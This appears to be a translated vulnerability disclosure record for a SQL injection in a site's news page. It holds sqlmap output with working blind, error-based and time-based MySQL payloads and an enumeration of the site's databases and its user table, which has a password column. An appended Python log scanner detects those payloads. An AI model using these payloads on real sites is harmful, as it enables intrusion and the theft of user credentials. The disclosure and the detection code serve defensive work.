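2015-12-14: Details reported to the vendor; awaiting vendor handling
2015-12-15: Vendor confirmed; details disclosed to the vendor only
2015-12-25: Details disclosed to core white hats and experts in related fields
2016-01-04: Details disclosed to regular white hats
2016-01-14: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public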
Target site: http://**.**.**.**/tw/
Injection point: http://**.**.**.**/tw/newspost.php?id=3778
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3778 AND 5474=5474

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=3778 AND (SELECT 8773 FROM(SELECT COUNT(*),CONCAT(0x717a7a7171,(SELECT (ELT(8773=8773,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=3778 AND (SELECT * FROM (SELECT(SLEEP(5)))gcgj)
---
web application technology: Apache 2.2.29, PHP 5.5.22
back-end DBMS: MySQL 5.0
current database: 'decomyp1_decodb'
current user is DBA: False
available databases [3]:
[*] decomyp1_decodb
[*] decomyp1_event
[*] information_schema
Tables in the current database; the data volume is fairly large:
Database: decomyp1_decodb
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| ads500_log      | 1295440 |
| search          | 300786  |
| user_log        | 142982  |
| ads501_log      | 53241   |
| photo           | 41575   |
| album_link      | 41515   |
| favorite        | 41058   |
| photo_link      | 31860   |
| favorite_news   | 24423   |
| album           | 23122   |
| `user`          | 22171   |
| contact         | 16316   |
| photo_resources | 7379    |
| p_comment       | 4858    |
| subscribe       | 4195    |
| ads502_log      | 3954    |
| blog_index      | 2770    |
| blog            | 2456    |
| ads500_link     | 1903    |
| msg             | 1440    |
| msg_linkc       | 1324    |
| top10_project   | 1201    |
| msg_link        | 1150    |
| blog_log        | 885     |
| shop            | 567     |
| addtable        | 367     |
| area2           | 367     |
| feedback        | 287     |
| ads500_client   | 245     |
| location        | 201     |
| shop_inv        | 129     |
| category        | 51      |
| top10           | 43      |
| blog_category   | 34      |
| top_shop        | 23      |
| area1           | 20      |
| shop_category   | 16      |
| blog_project    | 5       |
+-----------------+---------+
The `user` table holds 22171 entries.
Table: user
[35 columns]
+-------------+----------------+
| Column      | Type           |
+-------------+----------------+
| about       | varchar(10000) |
| chk1        | varchar(2)     |
| chk2        | varchar(2)     |
| chk3        | varchar(2)     |
| chk4        | varchar(2)     |
| chk5        | varchar(2)     |
| chkyn       | varchar(2)     |
| city_id     | int(11)        |
| create_time | timestamp      |
| fav_qty     | int(11)        |
| faved_qty   | int(11)        |
| fb_connect  | varchar(10)    |
| fb_id       | varchar(200)   |
| iage        | varchar(10)    |
| iam         | varchar(10)    |
| icon        | varchar(2)     |
| id          | int(11)        |
| ikid        | varchar(10)    |
| ilive       | varchar(10)    |
| istyle      | varchar(1000)  |
| job         | varchar(200)   |
| location_id | int(11)        |
| login_id    | varchar(50)    |
| login_pwd   | varchar(20)    |
| login_time  | timestamp      |
| msn         | varchar(50)    |
| myalbum_id  | int(11)        |
| photo_name  | varchar(300)   |
| photo_name2 | varchar(300)   |
| screen_name | varchar(100)   |
| user_ip     | varchar(50)    |
| web1        | varchar(200)   |
| web2        | varchar(200)   |
| web3        | varchar(200)   |
| web4        | varchar(200)   |
+-------------+----------------+
User information:
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-12-15 23:19
Thank you for the report.
None yet
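
As an added example (not part of the original report, the vendor's code, or sqlmap): a log check for the three payload families in the sqlmap output above, relying on the fact that `id` on `newspost.php` is a plain integer in the reported URL. The combined access-log format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the three techniques listed in the sqlmap output in the report.
SIGNATURES = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
]
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_id(value):
    """Return None for a plain integer id, otherwise a label for the finding."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-integer id"

def scan(lines, path_suffix="/newspost.php", param="id"):
    """Return (line_number, label, decoded_value) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(path_suffix):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify_id(value)
            if label:
                findings.append((number, label, value))
    return findings

# Constructed sample log lines (documentation IP 192.0.2.10), not taken from the report.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Dec/2015:10:00:01 +0800] "GET /tw/newspost.php?id=3778 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [14/Dec/2015:10:00:02 +0800] "GET /tw/newspost.php?id=3778%20AND%205474%3D5474 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [14/Dec/2015:10:00:03 +0800] "GET /tw/newspost.php?id=3778%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))gcgj) HTTP/1.1" 200 5120',
    '192.0.2.10 - - [14/Dec/2015:10:00:04 +0800] "GET /tw/newspost.php?id=3778%27 HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for number, label, value in scan(SAMPLE_LOG):
        print(f"line {number}: {label}: {value}")
```

The integer allowlist in `classify_id` is the stronger control: applied server-side before the query is built, together with a parameterized query, it rejects all three payload types without relying on the signatures.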